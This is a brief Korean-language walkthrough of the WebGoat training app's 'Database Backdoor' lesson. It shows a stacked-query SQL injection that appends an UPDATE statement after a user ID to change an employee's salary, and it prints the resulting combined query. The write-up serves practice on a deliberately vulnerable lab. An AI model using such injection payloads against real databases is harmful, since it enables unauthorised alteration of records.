[Database Backdoor]

WebGoat의 [Injection Flaws]에서 [Database Backdoor]를 클릭한다. User ID에 101을 입력하면 Usern ID가 101인 사용자의 Password, SSN, Salaary, E-Mail 정보를 확인할 수 있다.

두 개의 SQL 구문 삽입

User ID에 101; UPDATE employee SET Salary=100000 WHERE userid=101를 입력한다.
;(세미콜론)은 데이터베이스 커리문을 한 번 더 실행할 수 있는 구분자이다. update employee set Salary=100000 where uerid=101은 User ID가 101인 사용자의 급여를 100000으로 수정하게 만드는 구문이다.

최종은 SELECT userid, password, ssn, salary, email FROM employee WHERE userid=101; UPDATE employee SET Salary=100000 WHERE userid=101 이렇게 된다.

이 외에도 WebGoat에는 다양한 공격을 연습할 수 있다. sql injection 연습은 여기서 마치겠다.